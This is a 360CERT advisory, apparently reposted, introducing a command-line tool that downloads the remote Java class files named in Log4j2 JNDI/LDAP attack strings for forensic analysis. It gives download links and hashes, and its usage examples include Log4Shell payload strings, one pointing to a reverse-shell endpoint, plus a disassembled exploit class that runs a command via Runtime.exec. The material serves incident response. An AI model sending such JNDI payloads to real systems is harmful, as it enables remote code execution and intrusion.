内容简介:报告编号:B6-2021-121502 报告来源:360CERT 报告作者:360CERT 更新日期:2021-12-15 简介 近日,Log4j2漏洞在互联网上呈现爆发性的攻击利用态势,黑客通过发送一条JNDI字符串荷载即可控制目标设备。据统计,该...
报告编号:B6-2021-121502
报告来源:360CERT
报告作者:360CERT
更新日期:2021-12-15
简介
近日,Log4j2漏洞在互联网上呈现爆发性的攻击利用态势,黑客通过发送一条JNDI字符串荷载即可控制目标设备。据统计,该漏洞影响6万+流行开源软件,影响70%以上的企业线上业务系统,安全人员针对此类漏洞攻击情况的调查分析取证需要付出极大的精力。为此,360CERT根据实战攻防经验,特别为业界的安全人员研发了一款Log4j2恶意荷载分析工具,希望能够帮助安全人员减轻负担,提升调查响应效率!
命令行 工具 批量下载ldap字符串荷载包含的远程恶意class文件,class文件可进行进一步的分析调查取证。
目前只支持 ldap 链接的 class 下载,会下载到payloads/{host}/{uuid}.class
http://pub-shbt.s3.360.cn/cert-public-file/log4j-dl-darwin-amd64
http://pub-shbt.s3.360.cn/cert-public-file/log4j-dl-linux-386
http://pub-shbt.s3.360.cn/cert-public-file/log4j-dl-linux-amd64
http://pub-shbt.s3.360.cn/cert-public-file/log4j-dl-windows-386.exe
http://pub-shbt.s3.360.cn/cert-public-file/log4j-dl-windows-amd64.exe
文件 md5
b0e20c5bf4a8e027cfb6e6ca85fd82fc log4j-dl-darwin-amd64
0ad55c116bfd75ee33f99830d153e874 log4j-dl-linux-386
3f56dbdbd7c9840481dae17667d5acd5 log4j-dl-linux-amd64
28b881491ed0487b0d64c908a600a350 log4j-dl-windows-386.exe
466d70eea544a8e0212adb0d7a3ab212 log4j-dl-windows-amd64.exe
使用
以 linux x64 为例
log4j-dl-linux-amd64 -t "ldap://127.0.0.1:233/Basic/ReverseShell/127.0.0.1/9999" log4j-dl-linux-amd64 -f 1.txt # 文件内容 cat 1.txt ldap://127.0.0.1:233/Basic/ReverseShell/127.0.0.1/9999 ldap://127.0.0.1:234/1195197842/asd
完整演示
./log4j-dl-linux-amd64 -t "ldap://192.168.55.102:10001/Exp" ____ __ ___ _____ ______ _____ _______ |___ \ / / / _ \ / ____| | ____| | __ \ |__ __| __) | / /_ | | | | | | | |__ | |__) | | | |__ < | '_ \ | | | | | | | __| | _ / | | ___) | | (_) | | |_| | | |____ | |____ | | \ \ | | |____/ \___/ \___/ \_____| |______| |_| \_\ |_| http://192.168.55.102:10000/Exp.class 2021/12/15 18:23:40 dump 'a72986b3-aa43-42a2-841b-7b25e2e40140.class'
javap -c ./payloads/192.168.55.102/a72986b3-aa43-42a2-841b-7b25e2e40140.class
Compiled from "Exp.java"
public class Exp {
public Exp();
Code:
0: aload_0
1: invokespecial #1 // Method java/lang/Object."<init>":()V
4: return
static {};
Code:
0: iconst_3
1: anewarray #2 // class java/lang/String
4: dup
5: iconst_0
6: ldc #3 // String bash
8: aastore
9: dup
10: iconst_1
11: ldc #4 // String -c
13: aastore
14: dup
15: iconst_2
16: ldc #5 // String gnome-calculator
18: aastore
19: astore_0
20: invokestatic #6 // Method java/lang/Runtime.getRuntime:()Ljava/lang/Runtime;
23: aload_0
24: invokevirtual #7 // Method java/lang/Runtime.exec:([Ljava/lang/String;)Ljava/lang/Process;
27: invokevirtual #8 // Method java/lang/Process.waitFor:()I
30: pop
31: goto 39
34: astore_0
35: aload_0
36: invokevirtual #10 // Method java/lang/Exception.printStackTrace:()V
39: return
Exception table:
from to target type
0 31 34 Class java/lang/Exception
}
可以完整的看到该恶意 Class 在通过java.lang.Runtime.exec执行gnome-calculator
演示地址:
https://asciinema.org/a/mkcOuClRBpKwDStjx48pxknKb
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
- Rietspoof恶意软件释放多个恶意有效载荷
- 使用开源代码拼凑出恶意代码:Frankenstein恶意活动分析
- Office 365团队:针对使用恶意InPage文档的恶意活动分析
- 使用Rootkit实现恶意挖矿:CVE-2019-3396漏洞新型恶意利用方式分析
- 全新的恶意攻击技术已出现:针对日本用户的复杂多阶段PowerShell恶意脚本分析
- 恶意软件DNSMESSENGER分析
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
